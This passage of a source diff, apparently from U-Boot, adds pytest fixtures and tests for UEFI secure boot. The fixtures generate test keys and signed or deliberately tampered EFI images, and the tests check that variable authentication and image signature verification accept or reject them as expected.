mnt_point), shell=True) + + # Sign image + check_call('cd %s; sbsign --key db.key --cert db.crt helloworld.efi' + % mnt_point, shell=True) + # Sign already-signed image with another key + check_call('cd %s; sbsign --key db1.key --cert db1.crt --output helloworld.efi.signed_2sigs helloworld.efi.signed' + % mnt_point, shell=True) + # Create a corrupted signed image + check_call('cd %s; sh %s/test/py/tests/test_efi_secboot/forge_image.sh helloworld.efi.signed helloworld_forged.efi.signed' + % (mnt_point, u_boot_config.source_dir), shell=True) + # Digest image + check_call('cd %s; %shash-to-efi-sig-list helloworld.efi db_hello.hash; %ssign-efi-sig-list -t "2020-04-07" -c KEK.crt -k KEK.key db db_hello.hash db_hello.auth' + % (mnt_point, EFITOOLS_PATH, EFITOOLS_PATH), + shell=True) + check_call('cd %s; %shash-to-efi-sig-list helloworld.efi.signed db_hello_signed.hash; %ssign-efi-sig-list -t "2020-04-03" -c KEK.crt -k KEK.key db db_hello_signed.hash db_hello_signed.auth' + % (mnt_point, EFITOOLS_PATH, EFITOOLS_PATH), + shell=True) + check_call('cd %s; %ssign-efi-sig-list -t "2020-04-07" -c KEK.crt -k KEK.key dbx db_hello_signed.hash dbx_hello_signed.auth' + % (mnt_point, EFITOOLS_PATH), + shell=True) + + check_call('virt-make-fs --partition=gpt --size=+1M --type=vfat {} {}'.format( + mnt_point, image_path), shell=True) + check_call('rm -rf {}'.format(mnt_point), shell=True) + + except CalledProcessError as exception: + pytest.skip('Setup failed: %s' % exception.cmd) + return + else: + yield image_path + finally: + call('rm -f %s' % image_path, shell=True) + +# +# Fixture for UEFI secure boot test of intermediate certificates +# + + +@pytest.fixture(scope='session') +def efi_boot_env_intca(request, u_boot_config): + """Set up file system for secure boot test. + + Set up a file system to be used in UEFI secure boot test + of intermediate certificates. + + Args: + request: Pytest request object. + u_boot_config: U-Boot configuration. + + Return: + A path to disk image to be used for testing + """ + image_path = u_boot_config.persistent_data_dir + image_path = image_path + '/test_efi_secboot_intca.img' + + try: + mnt_point = u_boot_config.persistent_data_dir + '/mnt_efi_secboot_intca' + check_call('rm -rf {}'.format(mnt_point), shell=True) + check_call('mkdir -p {}'.format(mnt_point), shell=True) + + # Create signature database + # PK + check_call('cd %s; openssl req -x509 -sha256 -newkey rsa:2048 -subj /CN=TEST_PK/ -keyout PK.key -out PK.crt -nodes -days 365' + % mnt_point, shell=True) + check_call('cd %s; %scert-to-efi-sig-list -g %s PK.crt PK.esl; %ssign-efi-sig-list -c PK.crt -k PK.key PK PK.esl PK.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # KEK + check_call('cd %s; openssl req -x509 -sha256 -newkey rsa:2048 -subj /CN=TEST_KEK/ -keyout KEK.key -out KEK.crt -nodes -days 365' + % mnt_point, shell=True) + check_call('cd %s; %scert-to-efi-sig-list -g %s KEK.crt KEK.esl; %ssign-efi-sig-list -c PK.crt -k PK.key KEK KEK.esl KEK.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + + # We will have three-tier hierarchy of certificates: + # TestRoot: Root CA (self-signed) + # TestSub: Intermediate CA (signed by Root CA) + # TestCert: User certificate (signed by Intermediate CA, and used + # for signing an image) + # + # NOTE: + # I consulted the following EDK2 document for certificate options: + # BaseTools/Source/Python/Pkcs7Sign/Readme.md + # Please not use them as they are in product system. They are + # for test purpose only. + + # TestRoot + check_call('cp %s/test/py/tests/test_efi_secboot/openssl.cnf %s' + % (u_boot_config.source_dir, mnt_point), shell=True) + check_call('cd %s; export OPENSSL_CONF=./openssl.cnf; openssl genrsa -out TestRoot.key 2048; openssl req -extensions v3_ca -new -x509 -days 365 -key TestRoot.key -out TestRoot.crt -subj "/CN=TEST_root/"; touch index.txt; touch index.txt.attr' + % mnt_point, shell=True) + # TestSub + check_call('cd %s; touch serial.new; export OPENSSL_CONF=./openssl.cnf; openssl genrsa -out TestSub.key 2048; openssl req -new -key TestSub.key -out TestSub.csr -subj "/CN=TEST_sub/"; openssl ca -in TestSub.csr -out TestSub.crt -extensions v3_int_ca -days 365 -batch -rand_serial -cert TestRoot.crt -keyfile TestRoot.key' + % mnt_point, shell=True) + # TestCert + check_call('cd %s; touch serial.new; export OPENSSL_CONF=./openssl.cnf; openssl genrsa -out TestCert.key 2048; openssl req -new -key TestCert.key -out TestCert.csr -subj "/CN=TEST_cert/"; openssl ca -in TestCert.csr -out TestCert.crt -extensions usr_cert -days 365 -batch -rand_serial -cert TestSub.crt -keyfile TestSub.key' + % mnt_point, shell=True) + # db + # for TestCert + check_call('cd %s; %scert-to-efi-sig-list -g %s TestCert.crt TestCert.esl; %ssign-efi-sig-list -c KEK.crt -k KEK.key db TestCert.esl db_a.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # for TestSub + check_call('cd %s; %scert-to-efi-sig-list -g %s TestSub.crt TestSub.esl; %ssign-efi-sig-list -t "2020-07-16" -c KEK.crt -k KEK.key db TestSub.esl db_b.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # for TestRoot + check_call('cd %s; %scert-to-efi-sig-list -g %s TestRoot.crt TestRoot.esl; %ssign-efi-sig-list -t "2020-07-17" -c KEK.crt -k KEK.key db TestRoot.esl db_c.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + ## dbx (hash of certificate with revocation time) + # for TestCert + check_call('cd %s; %scert-to-efi-hash-list -g %s -t "2020-07-20" -s 256 TestCert.crt TestCert.crl; %ssign-efi-sig-list -c KEK.crt -k KEK.key dbx TestCert.crl dbx_a.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # for TestSub + check_call('cd %s; %scert-to-efi-hash-list -g %s -t "2020-07-21" -s 256 TestSub.crt TestSub.crl; %ssign-efi-sig-list -t "2020-07-18" -c KEK.crt -k KEK.key dbx TestSub.crl dbx_b.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # for TestRoot + check_call('cd %s; %scert-to-efi-hash-list -g %s -t "2020-07-22" -s 256 TestRoot.crt TestRoot.crl; %ssign-efi-sig-list -t "2020-07-19" -c KEK.crt -k KEK.key dbx TestRoot.crl dbx_c.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + + # Sign image + # additional intermediate certificates may be included + # in SignedData + + check_call('cp %s/lib/efi_loader/helloworld.efi %s' % + (u_boot_config.build_dir, mnt_point), shell=True) + # signed by TestCert + check_call('cd %s; %ssbsign --key TestCert.key --cert TestCert.crt --out helloworld.efi.signed_a helloworld.efi' + % (mnt_point, SBSIGN_PATH), shell=True) + # signed by TestCert with TestSub in signature + check_call('cd %s; %ssbsign --key TestCert.key --cert TestCert.crt --addcert TestSub.crt --out helloworld.efi.signed_ab helloworld.efi' + % (mnt_point, SBSIGN_PATH), shell=True) + # signed by TestCert with TestSub and TestRoot in signature + check_call('cd %s; cat TestSub.crt TestRoot.crt > TestSubRoot.crt; %ssbsign --key TestCert.key --cert TestCert.crt --addcert TestSubRoot.crt --out helloworld.efi.signed_abc helloworld.efi' + % (mnt_point, SBSIGN_PATH), shell=True) + + check_call('virt-make-fs --partition=gpt --size=+1M --type=vfat {} {}'.format(mnt_point, image_path), shell=True) + check_call('rm -rf {}'.format(mnt_point), shell=True) + + except CalledProcessError as e: + pytest.skip('Setup failed: %s' % e.cmd) + return + else: + yield image_path + finally: + call('rm -f %s' % image_path, shell=True) diff --git a/test/py/tests/test_efi_secboot/defs.py b/test/py/tests/test_efi_secboot/defs.py new file mode 100644 index 00000000000..6a2317e295b --- /dev/null +++ b/test/py/tests/test_efi_secboot/defs.py @@ -0,0 +1,16 @@ +# SPDX-License-Identifier: GPL-2.0+ + +"""Constants used for secure boot test.""" + +# Owner guid +GUID = '11111111-2222-3333-4444-123456789abc' + +# v1.5.1 or earlier of efitools has a bug in sha256 calculation, and +# you need build a newer version on your own. +# The path must terminate with '/'. +EFITOOLS_PATH = '' + +# "--addcert" option of sbsign must be available, otherwise +# you need build a newer version on your own. +# The path must terminate with '/'. +SBSIGN_PATH = '' diff --git a/test/py/tests/test_efi_secboot/forge_image.sh b/test/py/tests/test_efi_secboot/forge_image.sh new file mode 100644 index 00000000000..2465d10fa7b --- /dev/null +++ b/test/py/tests/test_efi_secboot/forge_image.sh @@ -0,0 +1,5 @@ +# SPDX-License-Identifier: GPL-2.0-or-later +#!/bin/sh + +replace_exp="s/H\0e\0l\0l\0o\0/h\0E\0L\0L\0O\0/g" +perl -p -e ${replace_exp} < $1 > $2 diff --git a/test/py/tests/test_efi_secboot/openssl.cnf b/test/py/tests/test_efi_secboot/openssl.cnf new file mode 100644 index 00000000000..f684f1df7e6 --- /dev/null +++ b/test/py/tests/test_efi_secboot/openssl.cnf @@ -0,0 +1,48 @@ +[ ca ] +default_ca = CA_default + +[ CA_default ] +new_certs_dir = . +database = ./index.txt +serial = ./serial +default_md = sha256 +policy = policy_min + +[ req ] +distinguished_name = def_distinguished_name + +[def_distinguished_name] + +# Extensions +# -addext " ... = ..." +# +[ v3_ca ] + # Extensions for a typical Root CA. + basicConstraints = critical,CA:TRUE + keyUsage = critical, digitalSignature, cRLSign, keyCertSign + subjectKeyIdentifier = hash + authorityKeyIdentifier = keyid:always,issuer + +[ v3_int_ca ] + # Extensions for a typical intermediate CA. + basicConstraints = critical, CA:TRUE + keyUsage = critical, digitalSignature, cRLSign, keyCertSign + subjectKeyIdentifier = hash + authorityKeyIdentifier = keyid:always,issuer + +[ usr_cert ] + # Extensions for user end certificates. + basicConstraints = CA:FALSE + keyUsage = critical, nonRepudiation, digitalSignature, keyEncipherment + extendedKeyUsage = clientAuth, emailProtection + subjectKeyIdentifier = hash + authorityKeyIdentifier = keyid,issuer + +[ policy_min ] + countryName = optional + stateOrProvinceName = optional + localityName = optional + organizationName = optional + organizationalUnitName = optional + commonName = supplied + emailAddress = optional diff --git a/test/py/tests/test_efi_secboot/test_authvar.py b/test/py/tests/test_efi_secboot/test_authvar.py new file mode 100644 index 00000000000..7b45f8fb814 --- /dev/null +++ b/test/py/tests/test_efi_secboot/test_authvar.py @@ -0,0 +1,281 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2019, Linaro Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org> +# +# U-Boot UEFI: Variable Authentication Test + +""" +This test verifies variable authentication +""" + +import pytest + + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('efi_secure_boot') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_nvedit_efi') +@pytest.mark.slow +class TestEfiAuthVar(object): + def test_efi_var_auth1(self, ubman, efi_boot_env): + """ + Test Case 1 - Install signature database + """ + ubman.restart_uboot() + disk_img = efi_boot_env + with ubman.log.section('Test Case 1a'): + # Test Case 1a, Initial secure state + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'printenv -e SecureBoot']) + assert '00000000: 00' in ''.join(output) + + output = ubman.run_command( + 'printenv -e SetupMode') + assert '00000000: 01' in output + + with ubman.log.section('Test Case 1b'): + # Test Case 1b, PK without AUTHENTICATED_WRITE_ACCESS + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' in ''.join(output) + + with ubman.log.section('Test Case 1c'): + # Test Case 1c, install PK + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'printenv -e -n PK']) + assert 'PK:' in ''.join(output) + + output = ubman.run_command( + 'printenv -e SecureBoot') + assert '00000000: 01' in output + output = ubman.run_command( + 'printenv -e SetupMode') + assert '00000000: 00' in output + + with ubman.log.section('Test Case 1d'): + # Test Case 1d, db/dbx without KEK + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' in ''.join(output) + + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx']) + assert 'Failed to set EFI variable' in ''.join(output) + + with ubman.log.section('Test Case 1e'): + # Test Case 1e, install KEK + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -i 4000000:$filesize KEK']) + assert 'Failed to set EFI variable' in ''.join(output) + + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'printenv -e -n KEK']) + assert 'KEK:' in ''.join(output) + + output = ubman.run_command( + 'printenv -e SecureBoot') + assert '00000000: 01' in output + + with ubman.log.section('Test Case 1f'): + # Test Case 1f, install db + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' in ''.join(output) + + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'printenv -e -n -guid d719b2cb-3d3a-4596-a3bc-dad00e67656f db']) + assert 'Failed to set EFI variable' not in ''.join(output) + assert 'db:' in ''.join(output) + + output = ubman.run_command( + 'printenv -e SecureBoot') + assert '00000000: 01' in output + + with ubman.log.section('Test Case 1g'): + # Test Case 1g, install dbx + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 dbx.auth', + 'setenv -e -nv -bs -rt -i 4000000:$filesize dbx']) + assert 'Failed to set EFI variable' in ''.join(output) + + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 dbx.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx', + 'printenv -e -n -guid d719b2cb-3d3a-4596-a3bc-dad00e67656f dbx']) + assert 'Failed to set EFI variable' not in ''.join(output) + assert 'dbx:' in ''.join(output) + + output = ubman.run_command( + 'printenv -e SecureBoot') + assert '00000000: 01' in output + + def test_efi_var_auth2(self, ubman, efi_boot_env): + """ + Test Case 2 - Update database by overwriting + """ + ubman.restart_uboot() + disk_img = efi_boot_env + with ubman.log.section('Test Case 2a'): + # Test Case 2a, update without AUTHENTICATED_WRITE_ACCESS + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'printenv -e -n -guid d719b2cb-3d3a-4596-a3bc-dad00e67656f db']) + assert 'Failed to set EFI variable' not in ''.join(output) + assert 'db:' in ''.join(output) + + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 db1.auth', + 'setenv -e -nv -bs -rt -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' in ''.join(output) + + with ubman.log.section('Test Case 2b'): + # Test Case 2b, update without correct signature + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 db.esl', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' in ''.join(output) + + with ubman.log.section('Test Case 2c'): + # Test Case 2c, update with correct signature + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 db1.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'printenv -e -n -guid d719b2cb-3d3a-4596-a3bc-dad00e67656f db']) + assert 'Failed to set EFI variable' not in ''.join(output) + assert 'db:' in ''.join(output) + + def test_efi_var_auth3(self, ubman, efi_boot_env): + """ + Test Case 3 - Append database + """ + ubman.restart_uboot() + disk_img = efi_boot_env + with ubman.log.section('Test Case 3a'): + # Test Case 3a, update without AUTHENTICATED_WRITE_ACCESS + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'printenv -e -n -guid d719b2cb-3d3a-4596-a3bc-dad00e67656f db']) + assert 'Failed to set EFI variable' not in ''.join(output) + assert 'db:' in ''.join(output) + + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 db2.auth', + 'setenv -e -nv -bs -rt -a -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' in ''.join(output) + + with ubman.log.section('Test Case 3b'): + # Test Case 3b, update without correct signature + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 db.esl', + 'setenv -e -nv -bs -rt -at -a -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' in ''.join(output) + + with ubman.log.section('Test Case 3c'): + # Test Case 3c, update with correct signature + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 db2.auth', + 'setenv -e -nv -bs -rt -at -a -i 4000000:$filesize db', + 'printenv -e -n -guid d719b2cb-3d3a-4596-a3bc-dad00e67656f db']) + assert 'Failed to set EFI variable' not in ''.join(output) + assert 'db:' in ''.join(output) + + def test_efi_var_auth4(self, ubman, efi_boot_env): + """ + Test Case 4 - Delete database without authentication + """ + ubman.restart_uboot() + disk_img = efi_boot_env + with ubman.log.section('Test Case 4a'): + # Test Case 4a, update without AUTHENTICATED_WRITE_ACCESS + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'printenv -e -n -guid d719b2cb-3d3a-4596-a3bc-dad00e67656f db']) + assert 'Failed to set EFI variable' not in ''.join(output) + assert 'db:' in ''.join(output) + + output = ubman.run_command_list([ + 'setenv -e -nv -bs -rt db', + 'printenv -e -n -guid d719b2cb-3d3a-4596-a3bc-dad00e67656f db']) + assert 'Failed to set EFI variable' in ''.join(output) + assert 'db:' in ''.join(output) + + with ubman.log.section('Test Case 4b'): + # Test Case 4b, update without correct signature/data + output = ubman.run_command_list([ + 'setenv -e -nv -bs -rt -at db', + 'printenv -e -n -guid d719b2cb-3d3a-4596-a3bc-dad00e67656f db']) + assert 'Failed to set EFI variable' in ''.join(output) + assert 'db:' in ''.join(output) + + def test_efi_var_auth5(self, ubman, efi_boot_env): + """ + Test Case 5 - Uninstall(delete) PK + """ + ubman.restart_uboot() + disk_img = efi_boot_env + with ubman.log.section('Test Case 5a'): + # Test Case 5a, Uninstall PK without correct signature + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'printenv -e -n PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + assert 'PK:' in ''.join(output) + + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 PK_null.esl', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'printenv -e -n PK']) + assert 'Failed to set EFI variable' in ''.join(output) + assert 'PK:' in ''.join(output) + + with ubman.log.section('Test Case 5b'): + # Test Case 5b, Uninstall PK with correct signature + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 PK_null.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'printenv -e -n PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + assert '\"PK\" not defined' in ''.join(output) + + output = ubman.run_command( + 'printenv -e SecureBoot') + assert '00000000: 00' in output + output = ubman.run_command( + 'printenv -e SetupMode') + assert '00000000: 01' in output diff --git a/test/py/tests/test_efi_secboot/test_signed.py b/test/py/tests/test_efi_secboot/test_signed.py new file mode 100644 index 00000000000..e8aaef7090c --- /dev/null +++ b/test/py/tests/test_efi_secboot/test_signed.py @@ -0,0 +1,371 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2019, Linaro Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org> +# +# U-Boot UEFI: Signed Image Authentication Test + +""" +This test verifies image authentication for signed images. +""" + +import pytest + + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('efi_secure_boot') +@pytest.mark.buildconfigspec('cmd_efidebug') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_nvedit_efi') +@pytest.mark.slow +class TestEfiSignedImage(object): + def test_efi_signed_image_auth1(self, ubman, efi_boot_env): + """ + Test Case 1 - Secure boot is not in force + """ + ubman.restart_uboot() + disk_img = efi_boot_env + with ubman.log.section('Test Case 1a'): + # Test Case 1a, run signed image if no PK + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'efidebug boot add -b 1 HELLO1 host 0:1 /helloworld.efi.signed -s ""', + 'efidebug boot order 1', + 'bootefi bootmgr']) + assert 'Hello, world!' in ''.join(output) + + with ubman.log.section('Test Case 1b'): + # Test Case 1b, run unsigned image if no PK + output = ubman.run_command_list([ + 'efidebug boot add -b 2 HELLO2 host 0:1 /helloworld.efi -s ""', + 'efidebug boot order 2', + 'bootefi bootmgr']) + assert 'Hello, world!' in ''.join(output) + + def test_efi_signed_image_auth2(self, ubman, efi_boot_env): + """ + Test Case 2 - Secure boot is in force, + authenticated by db (TEST_db certificate in db) + """ + ubman.restart_uboot() + disk_img = efi_boot_env + with ubman.log.section('Test Case 2a'): + # Test Case 2a, db is not yet installed + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot add -b 1 HELLO1 host 0:1 /helloworld.efi.signed -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert('\'HELLO1\' failed' in ''.join(output)) + assert('efi_bootmgr_load() returned: 26' in ''.join(output)) + output = ubman.run_command_list([ + 'efidebug boot add -b 2 HELLO2 host 0:1 /helloworld.efi -s ""', + 'efidebug boot order 2', + 'efidebug test bootmgr']) + assert '\'HELLO2\' failed' in ''.join(output) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + + with ubman.log.section('Test Case 2b'): + # Test Case 2b, authenticated by db + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot order 2', + 'efidebug test bootmgr']) + assert '\'HELLO2\' failed' in ''.join(output) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot order 1', + 'bootefi bootmgr']) + assert 'Hello, world!' in ''.join(output) + + def test_efi_signed_image_auth3(self, ubman, efi_boot_env): + """ + Test Case 3 - rejected by dbx (TEST_db certificate in dbx) + """ + ubman.restart_uboot() + disk_img = efi_boot_env + with ubman.log.section('Test Case 3a'): + # Test Case 3a, rejected by dbx + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi.signed -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + + with ubman.log.section('Test Case 3b'): + # Test Case 3b, rejected by dbx even if db allows + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + + def test_efi_signed_image_auth4(self, ubman, efi_boot_env): + """ + Test Case 4 - revoked by dbx (digest of TEST_db certificate in dbx) + """ + ubman.restart_uboot() + disk_img = efi_boot_env + with ubman.log.section('Test Case 4'): + # Test Case 4, rejected by dbx + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 dbx_hash.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx', + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi.signed -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + + def test_efi_signed_image_auth5(self, ubman, efi_boot_env): + """ + Test Case 5 - multiple signatures + one signed with TEST_db, and + one signed with TEST_db1 + """ + ubman.restart_uboot() + disk_img = efi_boot_env + with ubman.log.section('Test Case 5a'): + # Test Case 5a, authenticated even if only one of signatures + # is verified + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi.signed_2sigs -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert 'Hello, world!' in ''.join(output) + + with ubman.log.section('Test Case 5b'): + # Test Case 5b, authenticated if both signatures are verified + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 db2.auth', + 'setenv -e -nv -bs -rt -at -a -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert 'Hello, world!' in ''.join(output) + + with ubman.log.section('Test Case 5c'): + # Test Case 5c, rejected if one of signatures (digest of + # certificate) is revoked + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 dbx_hash.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + + with ubman.log.section('Test Case 5d'): + # Test Case 5d, rejected if both of signatures are revoked + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 dbx_hash2.auth', + 'setenv -e -nv -bs -rt -at -a -i 4000000:$filesize dbx']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + + # Try rejection in reverse order. + ubman.restart_uboot() + with ubman.log.section('Test Case 5e'): + # Test Case 5e, authenticated even if only one of signatures + # is verified. Same as before but reject dbx_hash1.auth only + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'fatload host 0:1 4000000 db2.auth', + 'setenv -e -nv -bs -rt -at -a -i 4000000:$filesize db', + 'fatload host 0:1 4000000 dbx_hash1.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi.signed_2sigs -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + + def test_efi_signed_image_auth6(self, ubman, efi_boot_env): + """ + Test Case 6 - using digest of signed image in database + """ + ubman.restart_uboot() + disk_img = efi_boot_env + with ubman.log.section('Test Case 6a'): + # Test Case 6a, verified by image's digest in db + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 